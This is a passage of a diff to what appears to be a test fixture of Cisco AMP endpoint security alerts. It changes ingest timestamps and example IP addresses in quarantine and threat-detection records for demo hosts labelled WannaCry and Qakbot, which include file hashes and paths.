Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010669200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -594,7 +594,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -635,7 +635,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -645,8 +645,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798668225Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:47.010674600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -666,7 +666,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -720,7 +720,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -737,8 +737,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798670499Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:47.010679800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -760,7 +760,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -810,7 +810,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -827,8 +827,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798672750Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:47.010685100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -850,7 +850,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -891,7 +891,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -901,8 +901,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798675025Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:47.010690300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -922,7 +922,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -963,7 +963,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -973,8 +973,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798677505Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010695900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -994,7 +994,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1039,7 +1039,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1049,8 +1049,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798679795Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010701200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1070,7 +1070,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1115,7 +1115,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1125,8 +1125,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798682063Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010706800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1146,7 +1146,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1191,7 +1191,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1201,8 +1201,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798684293Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:47.010712300Z", + "original": 